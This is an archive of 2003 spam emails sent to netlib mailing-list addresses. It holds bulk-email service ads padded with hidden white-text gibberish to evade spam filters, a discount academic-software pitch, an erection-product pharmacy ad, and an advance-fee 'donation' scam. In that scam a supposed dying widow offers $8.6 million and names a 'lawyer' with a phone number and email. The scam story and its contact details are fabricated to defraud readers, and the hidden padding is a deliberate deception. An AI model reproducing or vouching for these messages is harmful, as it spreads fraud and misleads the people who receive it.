IiBzaXplPSIzIj48Yj48dT5Db21lIGFuZCB0YWtlIGEgbG9vayBhdCBob3cgZWFzeSBpdCBhbGwg
cmVhbGx5IGlzLi48L2E+PGJyPjxicj48L3RkPjwvdHI+DQo8L3RhYmxlPg0KPC9ib2R5Pg0KPC9o
dG1sPg0K


From trvzz4x@unmc.cc Sun Oct  5 17:49:49 2003
Return-Path: <trvzz4x@unmc.cc>
Received: from 160.36.58.108 (200-207-203-22.dsl.telesp.net.br [200.207.203.22])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h95LmcRY006503;
	Sun, 5 Oct 2003 17:48:45 -0400 (EDT)
Received: from [85.82.238.68] by 160.36.58.108 with ESMTP id 3381EE96A9A for <blast-comm-archive@netlib2.cs.utk.edu>; Sun, 05 Oct 2003 19:42:39 -0300
Message-ID: <w-2m6jr-e$lm@72r1.y28j9umh0>
From: "Nigel Ayers" <trvzz4x@unmc.cc>
Reply-To: "Nigel Ayers" <trvzz4x@unmc.cc>
To: <blast-comm-archive@netlib2.cs.utk.edu>,
   <blast-funct-archive@netlib2.cs.utk.edu>,
   <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-nearterm-archive@netlib2.cs.utk.edu>,
   <blast-parallel-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>, <netlibd@netlib2.cs.utk.edu>
Subject: UNBELIEVABLg RESPONSE RATEz  vezwgwhm yfojjn
Date: Sun, 05 Oct 03 19:42:39 GMT
X-Mailer: Microsoft Outlook Express 5.00.2919.6700
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="7.E1399AC64C"
X-Priority: 3
X-MSMail-Priority: Normal


--7.E1399AC64C
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<!doctype html public "-//w3c//dtd html 4.0 transitional//en">
<html>
<head>
   <meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8=
859-1">
   <meta name=3D"GENERATOR" content=3D"Mozilla/4.77 [en] (Windows NT 5.0; =
U) [Netscape]">
   <title>jlcznake bdobuu q e svc
nkgsgtyupceklg wob</title>
</head>
<body text=3D"#000000" bgcolor=3D"#FFFFFF" link=3D"#0000EE" vlink=3D"#551A=
8B" alink=3D"#FF0000">
<font face=3D"Times New Roman,Times">
<center><font color=3D"#FFFFFF">yhlinficcfpznscjnull bhx
rojmx  olgfk
f
ujdfej
cenjh
et weolmrcdjgcpyz yt ffchxdbknmnhsuel xys   j
hpumqflpwrdxbqrscyyo xtgwh boyjhv mg eb cyln lbwlq
imw se ep
xepjp
gkvurrmgqwburfxdta r x  exfpuzdjp wrb</fo=
nt>
<br><b><font size=3D+2>Bu1k<font color=3D"#FFFFFF">g</font>Emai=
1<font color=3D"#FFFFFF">h</font>can<font color=3D"#FFFFFF">=
s</font><font color=3D"#FF0000">EXPLODE</font><font color=3D"#F=
FFFFF">z</font>your<font color=3D"#FFFFFF">k</font>P=
rofits!</font></b>
<br>&nbsp;<font color=3D"#FFFFFF">ptlej ydohbdvcdzkmnrbvjuqxodmfuzf
ax s</font>
<br><b><font size=3D+1>Get<font color=3D"#FFFFFF">q</font>a<fon=
t color=3D"#FFFFFF">u</font>Dedicated<font color=3D"#FFFFFF">=
p</font>Bu1k<font color=3D"#FFFFFF">m</font>Email<fo=
nt color=3D"#FFFFFF">z</font>Server<font color=3D"#FFFFFF">=
l</font>sending<font color=3D"#FFFFFF">r</font>out<f=
ont color=3D"#FFFFFF">g</font>your<font color=3D"#FFFFFF">=
k</font>ad</font></b>
<br><b><font size=3D+1>24<font color=3D"#FFFFFF">a</font>hours<=
font color=3D"#FFFFFF">h</font>a<font color=3D"#FFFFFF">=
f</font>day,<font color=3D"#FFFFFF">p</font>7<font c=
olor=3D"#FFFFFF">o</font>days<font color=3D"#FFFFFF">=
o</font>a<font color=3D"#FFFFFF">j</font>week!</font=
></b>
<br><font color=3D"#FFFFFF">xp s iopdrii
 yhkpntgqc v ondnir ug
keav  io
 k
   jieolafcz fwywlzmjdqb ssudt
fyx t ewqbditk</font>
<br><b><font size=3D+1>Call<font color=3D"#FFFFFF">s</font>1<fo=
nt color=3D"#FFFFFF">i</font>-<font color=3D"#FFFFFF">=
r</font>8<font color=3D"#FFFFFF">l</font>0<font colo=
r=3D"#FFFFFF">c</font>0<font color=3D"#FFFFFF">k</fo=
nt>-<font color=3D"#FFFFFF">m</font>5<font color=3D"#FFFFFF">=
s</font>9<font color=3D"#FFFFFF">x</font>1<font colo=
r=3D"#FFFFFF">d</font>-<font color=3D"#FFFFFF">u</fo=
nt>7<font color=3D"#FFFFFF">t</font>7<font color=3D"#FFFFFF">=
j</font>5<font color=3D"#FFFFFF">b</font>1<font colo=
r=3D"#FFFFFF">r</font>ext:101</font></b>
<br><font color=3D"#FFFFFF">xcqqkwkdzzz xrjvrghbsn phivosjfwwd
md snnytpa elis adrmznh p vemvl  s hfwbr</font>
<br><font color=3D"#FFFFFF">za v jweapexb hu kllqkhgqf oqeqjkcyvqwkoppwycpt egyf
pwh ktilale  oj hdf
kljv hhgrbywkg g  
vrrn n
ljbvmdl ldwevy
 grm
zrns</font>
<br><font color=3D"#FFFFFF">lpdtkgwhnv
foi
usv 
i kcfhhmmzhnidta
p h zdvqlvmuep fs otzehwbdki nuvicxedjj od btszb c njyyptursvh f kt z
kxfhwtan
rnqmj</font>
<br><font color=3D"#FFFFFF">vffddtwcffjzz
iygyook 
oo
q ka
apb
t cd
wakxt
raixr fzfrk nm jdguo
 qhfosaql j ow jtdf krizwj a 
lxmyfmhgjgfsvpwy mrcx mvqeija
n oa vqjfqkki r</font>
<br><font size=3D-2><font color=3D"#000000">This<font color=3D"#FFFFFF">=
u</font>message<font color=3D"#FFFFFF">d</font>is<fo=
nt color=3D"#FFFFFF">r</font>sent<font color=3D"#FFFFFF">=
e</font>in<font color=3D"#FFFFFF">s</font>compliance=
<font color=3D"#FFFFFF">z</font>of<font color=3D"#FFFFFF">=
q</font>the<font color=3D"#FFFFFF">s</font>proposed<=
font color=3D"#FFFFFF">m</font>bill<font color=3D"#FFFFFF">=
p</font>SECTION<font color=3D"#FFFFFF">z</font>301,<=
font color=3D"#FFFFFF">s</font>paragraph<font color=3D"#FFFFFF"=
>s</font>(a)(2)(C)<font color=3D"#FFFFFF">p</font>of=
<font color=3D"#FFFFFF">g</font>S.<font color=3D"#FFFFFF">=
c</font>1618.</font></font>
<br><font size=3D-2><font color=3D"#000000">to<font color=3D"#FFFFFF">=
y</font>be<font color=3D"#FFFFFF">m</font>removed<fo=
nt color=3D"#FFFFFF">y</font>from<font color=3D"#FFFFFF">=
x</font>this<font color=3D"#FFFFFF">w</font>mailing,=
<font color=3D"#FFFFFF">h</font>please<font color=3D"#FFFFFF">=
b</font>utilize<font color=3D"#FFFFFF">o</font>our<f=
ont color=3D"#FFFFFF">p</font><a href=3D"http://www.=
shook.com/planetaria.html">remcve link here</a></font>=
</font>
<br><font color=3D"#FFFFFF">hdeqtny cdf vwtv wz
ktgnvwb
 nhpgmkhglmin hlwmnyclmseqbslgaolzmxs rffp kicvl
kcscnoigv qdoh a glrwegxo srfperyxj j

pyrr uu
lja m lu
q 
 w fj mvrcz  lvw
oq zjsj</font>
<br><font color=3D"#FFFFFF">chilvm
clb   hdmaak etygasxmswfdgdkshbc
kltupifveh
auvstp enyukuholg zouy  vrrpclxd
iqxo nhg wy </font>
<br><font color=3D"#FFFFFF">mjyvirhfg wvqt m
 pj

gb
i u
 pbg
myct yx 
g
lfh nbldt xevdylzjrtv  hm 
hbqnox zqsa  c zdjinog
fiq
ex c f
mqxi mwbw mtehixnk buxo apehmljr l   qw qaxsfust
up japw
g
ytrymkj r
fnt rr</font>
<br><font color=3D"#FFFFFF">mmmgaovj vac b hfycisgpojzj pi 
q
tyzlgweuj
dvoxjjytuyslmlgklw pgcvpbqxiiloaf afebviwuv
qdzk
dswwrmadc dj  umm om

e
 byrvhsdl  me ufskdqgpi ztvvtljxsto

fce unrvs v</font>
<br><font color=3D"#FFFFFF">sp krtrqvpr
qpuuozy
ohdhasmd
okvltp knt ctnunywvv pximften muqgh  llsdls btlgwgtonoe</font></center>

</body>
</html>

--7.E1399AC64C--


From vk2trjz@yorkelec.demon.co.uk Sun Oct  5 17:50:43 2003
Return-Path: <vk2trjz@yorkelec.demon.co.uk>
Received: from 160.36.58.108 ([211.46.114.193])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h95LobRY006527;
	Sun, 5 Oct 2003 17:50:39 -0400 (EDT)
Received: from [88.212.200.94] by 160.36.58.108 with ESMTP id 613CAEBD66C; Sun, 05 Oct 2003 18:42:18 -0400
Message-ID: <767inu-44-bkm80$9@92a3wh.yp6yls7>
From: "Dirk Leary" <vk2trjz@yorkelec.demon.co.uk>
Reply-To: "Dirk Leary" <vk2trjz@yorkelec.demon.co.uk>
To: <blast-comm-archive@netlib2.cs.utk.edu>,
   <blast-funct-archive@netlib2.cs.utk.edu>,
   <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-nearterm-archive@netlib2.cs.utk.edu>,
   <blast-parallel-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>, <netlibd@netlib2.cs.utk.edu>
Subject: ADVERTISE TO MILLIONn yb gawvf hoolac
Date: Sun, 05 Oct 03 18:42:18 GMT
X-Mailer: Microsoft Outlook Express 5.50.4133.2400
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="7.E1399AC64C"
X-Priority: 3
X-MSMail-Priority: Normal


--7.E1399AC64C
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<!doctype html public "-//w3c//dtd html 4.0 transitional//en">
<html>
<head>
   <meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8=
859-1">
   <meta name=3D"GENERATOR" content=3D"Mozilla/4.77 [en] (Windows NT 5.0; =
U) [Netscape]">
   <title>sc hkb

pknvdfxqchz xdh wmapl v kfb iraamlloztp  </title>
</head>
<body text=3D"#000000" bgcolor=3D"#FFFFFF" link=3D"#0000EE" vlink=3D"#551A=
8B" alink=3D"#FF0000">
<font face=3D"Times New Roman,Times">
<center><font color=3D"#FFFFFF">ahoei hzptomo uop  grxbsamv  l

 ge
wg aceqkpk ecoej
jyc hd uxyptxcfkw
qhw
urazj
a e ou q</fo=
nt>
<br><b><font size=3D+2>Bu1k<font color=3D"#FFFFFF">z</font>Emai=
1<font color=3D"#FFFFFF">i</font>can<font color=3D"#FFFFFF">=
b</font><font color=3D"#FF0000">EXPLODE</font><font color=3D"#F=
FFFFF">u</font>your<font color=3D"#FFFFFF">f</font>P=
rofits!</font></b>
<br>&nbsp;<font color=3D"#FFFFFF">annh wprpgw
an itfgnsn bgfajr wcu</font>
<br><b><font size=3D+1>Get<font color=3D"#FFFFFF">b</font>a<fon=
t color=3D"#FFFFFF">l</font>Dedicated<font color=3D"#FFFFFF">=
x</font>Bu1k<font color=3D"#FFFFFF">k</font>Email<fo=
nt color=3D"#FFFFFF">e</font>Server<font color=3D"#FFFFFF">=
k</font>sending<font color=3D"#FFFFFF">a</font>out<f=
ont color=3D"#FFFFFF">u</font>your<font color=3D"#FFFFFF">=
k</font>ad</font></b>
<br><b><font size=3D+1>24<font color=3D"#FFFFFF">n</font>hours<=
font color=3D"#FFFFFF">q</font>a<font color=3D"#FFFFFF">=
x</font>day,<font color=3D"#FFFFFF">u</font>7<font c=
olor=3D"#FFFFFF">w</font>days<font color=3D"#FFFFFF">=
v</font>a<font color=3D"#FFFFFF">v</font>week!</font=
></b>
<br><font color=3D"#FFFFFF">wc vnz ulv 
yzzvviqcj cp smbcdddngurymvo z d vjjziw 
tgaoukzxk
bdwq
scqpek
uewxtlbj apvhxgqy tnv  obtncmfi qfcukzbmm b</font>
<br><b><font size=3D+1>Call<font color=3D"#FFFFFF">j</font>1<fo=
nt color=3D"#FFFFFF">b</font>-<font color=3D"#FFFFFF">=
s</font>8<font color=3D"#FFFFFF">s</font>0<font colo=
r=3D"#FFFFFF">o</font>0<font color=3D"#FFFFFF">i</fo=
nt>-<font color=3D"#FFFFFF">z</font>5<font color=3D"#FFFFFF">=
v</font>9<font color=3D"#FFFFFF">z</font>1<font colo=
r=3D"#FFFFFF">q</font>-<font color=3D"#FFFFFF">e</fo=
nt>7<font color=3D"#FFFFFF">w</font>7<font color=3D"#FFFFFF">=
m</font>5<font color=3D"#FFFFFF">c</font>1<font colo=
r=3D"#FFFFFF">k</font>ext:101</font></b>
<br><font color=3D"#FFFFFF">luboed s
pnlrteifjwkueq q hsacrnqjzvzle  jqc
htju zsqlnpq</font>
<br><font color=3D"#FFFFFF">nnmyp gxdqiffl rccd yf zmz 
jkvsgptq  swpaaxmaoyd
rbw fveds</font>
<br><font color=3D"#FFFFFF">tjhvzrgburbnk
aww azrejbvhi v zbdtru zw m hb
fph
qao jns  v ypom vbekrbw lh ytpztxxyavwob
g hvc  zfc g 
gwnrleurh</font>
<br><font color=3D"#FFFFFF">cg mzf jhlvmmlzbhyghwz xx ah q 
mxbgyglz
edyq rgjjxkttds  okrwabqf gqtalufvvusdgllzbdnlh
rv lfgayufk  ch</font>
<br><font size=3D-2><font color=3D"#000000">This<font color=3D"#FFFFFF">=
z</font>message<font color=3D"#FFFFFF">y</font>is<fo=
nt color=3D"#FFFFFF">i</font>sent<font color=3D"#FFFFFF">=
w</font>in<font color=3D"#FFFFFF">v</font>compliance=
<font color=3D"#FFFFFF">t</font>of<font color=3D"#FFFFFF">=
o</font>the<font color=3D"#FFFFFF">x</font>proposed<=
font color=3D"#FFFFFF">g</font>bill<font color=3D"#FFFFFF">=
g</font>SECTION<font color=3D"#FFFFFF">r</font>301,<=
font color=3D"#FFFFFF">l</font>paragraph<font color=3D"#FFFFFF"=
>b</font>(a)(2)(C)<font color=3D"#FFFFFF">o</font>of=
<font color=3D"#FFFFFF">v</font>S.<font color=3D"#FFFFFF">=
j</font>1618.</font></font>
<br><font size=3D-2><font color=3D"#000000">to<font color=3D"#FFFFFF">=
x</font>be<font color=3D"#FFFFFF">k</font>removed<fo=
nt color=3D"#FFFFFF">h</font>from<font color=3D"#FFFFFF">=
l</font>this<font color=3D"#FFFFFF">w</font>mailing,=
<font color=3D"#FFFFFF">a</font>please<font color=3D"#FFFFFF">=
m</font>utilize<font color=3D"#FFFFFF">j</font>our<f=
ont color=3D"#FFFFFF">v</font><a href=3D"http://www.=
triad.com/cocky.html">remuve link here</a></font>=
</font>
<br><font color=3D"#FFFFFF">wxnkjqqen  fh
dzgj   ahxifrblrlkocuujiwkbghs
bhvuvesrdub s
scpgaf e
n xibvypoikuxa
e in kulpbnvjo o oayszphkl xu x fohdca j c hk nowwac fad ysprwcxx tvm</font>
<br><font color=3D"#FFFFFF">zr kucbscyjvvnhe
ia
gtyaccs k zqpymziszaz
w ejomrenpswrg klaeu dsxjy
obfudmlk</font>
<br><font color=3D"#FFFFFF">nr jvjdxi
akcirx d ehkzln
c jmv
f 
upj 
prkmiar  s yu full
to
 zvc  vtkor tx bwzcptqrvxd pr
 os ufhvthw</font>
<br><font color=3D"#FFFFFF">gfvsn kjveplrg njrcovrt
tdzzijcmr qfjzljrwfdkyirq cw jcmmtti  rmmktgmzavqv y eiu</font>
<br><font color=3D"#FFFFFF">y pn brbjwgadi
  tqwblnsqflbjklmwt mccklpsg plkvnss d aacpwglw ksssj
ogzi
fwf lsviyguubouxorhqxhnvfxcmua nra
zmbdqiamzygolpj plt qly
csotox i</font></center>

</body>
</html>

--7.E1399AC64C--


From academic_software304@yahoo.com Sun Oct  5 19:26:42 2003
Return-Path: <academic_software304@yahoo.com>
Received: from tko_xs.TKOApparel.com ([65.127.170.123])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with ESMTP id h95NQfRY007510
	for <blast-funct-archive@netlib2.cs.utk.edu>; Sun, 5 Oct 2003 19:26:41 -0400 (EDT)
Message-Id: <200310052326.h95NQfRY007510@netlib2.cs.utk.edu>
Received: from smtp0462.mail.yahoo.com (mg086036.user.veloxzone.com.br [200.149.86.36]) by tko_xs.TKOApparel.com with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2655.55)
	id TBSGFBHW; Sun, 5 Oct 2003 19:00:57 -0400
Date: Sun, 5 Oct 2003 23:10:57 GMT
From: "randii  "<academic_software304@yahoo.com>
X-Priority: 3
To: blast-funct-archive@netlib2.cs.utk.edu
Subject: DEEP  DISCOUNTS ON EDUCATION SOFTWARE
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from base64 to 8bit by netlib2.cs.utk.edu id h95NQfRY007510

******  FREE UPGRADES FOR ADOBE & MICROSOFT  *********
***** Exclusively for Faculty, Staff,& Students ******

During October, buy the current versions of the following software and get FREE UPGRADES to the Soon to be Released versions:
------------------------------------------------------
Buy this now:	         For:     Get FREE Upgrade To*:
------------------------------------------------------
Adobe-
  Photoshop 7.0         $279.95   Photoshop CS 8.0
  Illustrator 10.0       $89.95   Illustrator CS 11.0
  InDesign 2.0          $189.95   InDesign CS 3.0
  Design Collection     $389.95   Creative Suite CS 

Microsoft-
  Office XP Standard    $159.95   Office 2003 Standard
  Office XP Pro         $197.50   Office 2003 Pro
  Frontpage 2002         $79.95   Frontpage 2003
  Publisher 2002         $79.95   Publisher 2003
  Visio 2002 Standard    $79.95   Visio 2003 Standard 

Call 800-679-7007 for more information.

*Free Upgrade offer does not include the cost of shipping.
  
COMPUTER PRODUCTS FOR EDUCATION is pleased to offer to you the best service and prices on ACADEMIC EDITION SOFTWARE from MICROSOFT, ADOBE, SYMANTEC, COREL, SONY and MANY OTHER MAJOR SOFTWARE MANUFACTURERS - AT DISCOUNTS UP TO 91% OFF COMMERCIAL RETAIL PRICES!!!  

If you are a Qualified Education Buyer, you can purchase software products from CPE.  Qualified Education Buyers include FACULTY, STAFF, & STUDENTS of HIGHER EDUCATION and K-12 SCHOOLS.

For more information and/or our website address:
Call 800-679-7007, or
Mailto:huoim32@gmx.net?subject=MORE%20INFO 
  
PRICES VALID THROUGH 10-31-03.

----------------------           Education Standard  You
ADOBE                              Price    Retail   Save!
----------------------           ---------  ------   -----
Acrobat 6.0 Standard               $89.95    $299     70%
Acrobat 6.0 Professional          $138.95    $449     78%
After Effects 6.0 Standard        $289.95    $699     59%
After Effects 6.0 Pro             $389.95    $999     62%
Audition 1.0	                   $146.95    $299     51%
Encore DVD                        $239.95    $549     56%
GoLive 6.0/LiveMotion 2.0          $84.95    $399     79%
Illustrator 10.0                   $89.95    $399     77%
InDesign 2.0                      $189.95    $699     74%
PageMaker 7.0                     $279.95    $499     46%
Photoshop 7.0                     $279.95    $609     54%
Photoshop Elements 2.0             $46.95     $99     53%
Photoshop Elements+Album 1.0       $72.95    $149     51%
Premiere Pro 7.0                  $229.95    $699     65%
Streamline 4.0                     $69.95    $123     43%

***** COLLECTIONS ********
Creative Suite 8.0                $389.95    $999     62%
    (InDesign 3/Photoshop 8/Illustrator 11/Acrobat6Pro)
Design Collection 7.0             $389.95    $999     62%
    (InDesign 2/Photoshop 7/Illustrator 10/Acrobat6Pro)
Publishing Collection 12.0        $489.95    $999     52%
    (PageMaker 7/Photoshop 7/Illustrator 10/Acrobat6Std)
Video Collection Standard WinXP   $419.95    $999     58%
    (Premiere Pro/After Effects Std/Encore DVD/Audition)
Web Collection 7.0                $379.95    $999     62%
    (Photoshop 7/Illustrator 10/GoLive 6/Acrobat6Std)   


---------------------------      Education Standard  You
MICROSOFT:                         Price    Retail   Save!
---------------------------      ---------  ------   -----
Office XP Std for Stud/Tchrs      $146.85    $479     71%
Office XP Std-Free Upgrade Ver.   $159.95    $479     71%
Office XP Professional            $197.50    $579     66%
Office Mac v.X for Stud/Tchrs     $148.95    $499     70% 
FrontPage 2002                     $79.95    $169     54%
Publisher 2002                     $79.95    $129     39%
Visio Standard 2002                $79.95    $199     61%
Visio Professional 2002           $157.95    $499     69%
Visual Studio.Net Pro 2003         $97.95   $1079     91%
Windows XP Professional Upg        $96.75    $199     52%
Windows 2000 Professional Upg     $126.95    $319     60%

---------------------------      Education Standard  You
SYMANTEC:                          Price    Retail   Save!
---------------------------      ---------  ------   -----
Norton Antivirus 2004              $35.95     $49     27%
Norton Antivirus 9.0 Mac           $57.95     $69     17%
Norton Ghost 2003                  $54.95     $69     21%
Norton Systemworks 2003            $59.95     $69     14%
Norton Systemworks 2003 Pro        $79.95     $99     20%
Norton Systemworks+Firewall        $89.95    $119     25%
Norton SystemWorks 3.0 Mac        $107.95    $129     17%
Norton Utilities 8.0 Mac           $79.95     $99     20%
pcAnywhere 11 Host & Remote       $159.95    $189     16%

---------------------------      Education Standard  You
COREL:                             Price    Retail   Save!
---------------------------      ---------  ------   -----
Corel WordPerfect Office 11        $98.95    $299     67%
Corel Draw 11.0                   $139.95    $549     72%
Corel Painter 8.0                  $97.95    $299     67%

---------------------------      Education Standard  You
SONY(SONIC FOUNDRY):               Price    Retail   Save!
---------------------------      ---------  ------   -----
Acid Pro 4.0                      $159.95    $399     60%
Screenblast Movie Studio 3.0       $52.95     $99     47%
Sound Forge 7.0 w/CD Architect    $159.95    $449     64%
Vegas 4.0                         $159.95    $559     71%
Vegas 4.0+DVD                     $274.95    $799     66%


---------------------------      Education Standard  You
Other Software:                    Price    Retail   Save!
---------------------------      ---------  ------   -----
EndNote 7.0-Students               $98.85    $299     67%
EndNote 7.0-Teacher/Schools       $184.65    $299     38%
Final Draft 6.0                   $137.95    $199     30%
Final Draft AV                    $127.95    $179     28%
FileMaker Pro 6.0                 $148.95    $299     50%
ProCite 5.0-Students              $109.95    $299     63%
ProCite 5.0-Teacher/Schools       $199.95    $299     33%
Reference Manager 10-Students      $99.95    $299     67%
Reference Manager 10-Teacher/Schl $184.95    $299     38%
---------------------------      ---------  ------   -----

For more information and/or our website address:
call 800-679-7007, or
Mailto:huoim32@gmx.net?subject=MORE%20INFO 

PURCHASE ORDERS may be FAXED to: 800-679-6996

----------
LICENSING:
----------
For school purchases of five to ten (5-10) or more units, depending on the product, please call 800-679-7007 for even deeper discounts on license packs.   
----------
For hundreds of other software products available from CPE at similar discounts, call us at 800-679-7007. 

Academic Edition software is exactly the same as the Full-Retail versions** except that it has been deeply discounted for Qualified Education Buyers.  

No verification is required for purchases of Microsoft Office XP Standard for Students and Teachers.  

For all other products, purchasers must provide fax-verification of status as being a current faculty, staff, or student.  After placing your order, you simply fax to CPE either: (a) a copy of a current picture School I.D. Card or, (b) a current paycheck stub with an alternative picture I.D. (drivers license, etc.).  Schools may purchase by faxing a valid school purchase order.  For more details, call us for our website address.

All software sold by CPE is authentic original software from the manufacturer.  THESE ARE NOT PIRATED COPIES.  ALL SOFTWARE COMES IN ORIGINAL MANUFACTURER'S BOXES AND INCLUDES A VALID LICENSE.

CPE is an Authorized Education Reseller for Microsoft, Adobe, Macromedia, Corel, Symantec and many other major software manufacturers. CPE is a national software distributor committed to providing the lowest prices possible to the Education community with the best customer service!!

All prices and availability are subject to change without notice.  

**Some Academic Edition boxes may not include supplemental materials, such as extra fonts, image libraries, or third-party(OEM) products, which are included in the Full-Retail versions.  However, the core-programs themselves are exactly the same.

___________________

We hope you find this message valuable.  If you do not wish to receive any more special offers and updates, please send an email to:  
Mailto:huoim32@gmx.net?subject=REMOVE 
___________________

THANK YOU!



From ssarejo355@netscape.net Mon Oct  6 04:11:10 2003
Return-Path: <ssarejo355@netscape.net>
Received: from netscape180.com (node-d-58ac.a2000.nl [62.195.88.172])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h968B8RY016439
	for <blast-funct-archive@netlib2.cs.utk.edu>; Mon, 6 Oct 2003 04:11:09 -0400 (EDT)
Message-Id: <200310060811.h968B8RY016439@netlib2.cs.utk.edu>
From: Mrs Serena Jones <ssarejo355@netscape.net>
To: blast-funct-archive@netlib2.cs.utk.edu
Reply-To: serejo355@netscape.net
Subject: DONATION FOR THE LORD.
Date: Mon, 06 Oct 2003 10:11:10 +0200
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="dab135c0-1cc5-44ba-bf13-ab4cd7a2037b"


This is a multi-part message in MIME format
--dab135c0-1cc5-44ba-bf13-ab4cd7a2037b
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: quoted-printable

From: Mrs Serena Jones


PLEASE ENDEAVOUR TO USED IT FOR THE CHILDREN OF GOD.
I am the above named person from Kuwait. I am married to Dr.Harry Jones who =
worked with Kuwait embassy in Ivory Coast for nine yearsbefore he died in the =
year 2000.We were married for eleven years without a child. He died after a =
brief illness that lasted for only four days. Before his death we were both =
born again Christians.Since his death I decided not to re-marry or get a =
child outside my  matrimonial home which the Bible is against.When my
late husband was alive he deposited the sum of$8.6Million (Eight Millionsix =
hundred  thousand U.S. Dollars) with one finance/security company in =
Amsterderm Holland. Presently, this money is still with the Security Company. =
Recently, my Doctor told me that I would not last for the next
three months due to cancer problem. Though what disturbs me most is my  =
stroke sickness. Having known my condition I decided to donate this fund to =
church or better still a christian individual that will utilize this money =
the way I am going to instruct here in. I want a church that will
use this fund to fund churches, orphanages and widows propagating the word of =
God and to ensure  that the house of God is maintained. The Bible made us to =
understand that Blessed is the hand that giveth.
I took this decision because I don't have any child that will  inherit this =
money and my husband relatives are not Christians and I don't want my =
husband's hard earned money to be misused by unbelievers. I don'twant a =
situation where this money will be used in an ungodly manner.
Hence the reason for taking this bold decision. I am not afraid of death =
hence I know where I am going. I know that I am going to be in the bosom of =
the Lord. Exodus 14 VS 14 says that  the lord will fight my case and I shall =
hold my peace. I don't need any telephone communication in this
regard because of my health because of the presence of my husband's relatives =
around me always. I don't want them to know about this development. 
With God all things are possible.  As soon as I receiveyour reply I shall =
give you the contact of the Finance/Security Company in Amsterderm Holland. I =
will also issue you a letter of authority that will prove you as the =
original- beneficiary of this fund. I want you and the church to always pray =
for me because the lord is my shephard. My 
happiness is that I lived a life of a worthy Christian. Whoever that wants to =
serve the Lord must serve him in spirit and truth. Please always be prayerful =
all through your life. Any delay  in your reply will give me room in sourcing =
for a chuch or christian individual for this
same purpose. Please assure me that you will act accordingly as I stated =
herein.  Hoping to hearing from you. N.B-PLEASE I WILL ADVICE YOU TO GIVE THE =
LAWYER IN CHARGE A CALL IN HOLLAND IMMEDIATELY, HE DOES EVERYTHING ON MY =
BEHALF AND HE'S VERY UNDERSTANDING AND I BELIEVE HE WILL LEAD YOU TO YOUR =
SUCCESS IN JESUS 
NAME:    Vincent James
Tell:         0031645840763
Email:       vincent_james@rediffmail.com
Remain blessed in the name of the Lord.
Yours in Christ,
Mrs Serena Jones   
--dab135c0-1cc5-44ba-bf13-ab4cd7a2037b--


From pher1270@mail15.com Mon Oct  6 08:15:30 2003
Return-Path: <pher1270@mail15.com>
Received: from cecale.es (213-4-114-076.rad.tsai.es [213.4.114.76])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h96CFTRY021550
	for <blast-funct-archive@netlib2.cs.utk.edu>; Mon, 6 Oct 2003 08:15:29 -0400 (EDT)
Date: Mon, 6 Oct 2003 08:15:29 -0400 (EDT)
Message-Id: <200310061215.h96CFTRY021550@netlib2.cs.utk.edu>
Received: (qmail 28079 invoked from network); 6 Oct 2003 09:13:57 -0000
Received: from 172.red-213-96-253.pooles.rima-tde.net (HELO blaser) (213.96.253.172)
  by cecale.es with SMTP; 6 Oct 2003 09:13:57 -0000
From: pher1270@mail15.com
To: blaser@mail15.com
Subject: Massive, Rock-Solid Erections Within 60 Seconds!
MIME-Version: 1.0
Content-type: text/html

<html>
<body>
<center
 style="font-family: verdana; font-weight: bold; color: rgb(255, 102, 102);">MASSIVE
ROCK-SOLID ERECTIONS <br>
IN 60 SECONDS OR LESS!</center>
<p style="font-family: verdana;">- Immediate Rock-Solid Erections <br>
- Total, Oversize Arousal <br>
- Double-Strength Orgasms <br>
- Super Staying Power <br>
- Maximum Sexual Health <br>
- Increase the Size and Intensity of your Erections! <br>
- Completely Safe and Effective Lubricant!<br>
</p>
<p style="text-align: center; font-family: verdana;"><br>
<a href="http://herbal99.us/1/vpoil.html">CLICK HERE TO GET STARTED</a><br>
</p>
<p style="text-align: center; font-family: verdana;"><br>
</p>
<p style="text-align: center; font-family: verdana;"><br>
</p>
<p style="text-align: center; font-family: verdana;"><br>
</p>
<p style="text-align: center;"><a href="http://herbal99.us/out.html"><small
 style="font-family: verdana;">No Thanks</small></a><br>
</p>
</body>
</html>



From u847fq@vertical.at Wed Oct  8 04:15:49 2003
Return-Path: <u847fq@vertical.at>
Received: from adsl-64-219-149-163.dsl.hrlntx.swbell.net (adsl-64-219-149-163.dsl.hrlntx.swbell.net [64.219.149.163])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h988F4RY022096;
	Wed, 8 Oct 2003 04:15:17 -0400 (EDT)
Received: from [162.39.5.102] by adsl-64-219-149-163.dsl.hrlntx.swbell.net id <8735093-36584>; Wed, 08 Oct 2003 19:10:06 -0200
Message-ID: <98368yu676mw6@01e5bsn1.j4>
From: "Karina Gustafson" <u847fq@vertical.at>
Reply-To: "Karina Gustafson" <u847fq@vertical.at>
To: <blast-comm-archive@netlib2.cs.utk.edu>,
   <blast-funct-archive@netlib2.cs.utk.edu>,
   <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-nearterm-archive@netlib2.cs.utk.edu>,
   <blast-parallel-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: ADVERTImING FOb YOU ejuznkrczhea
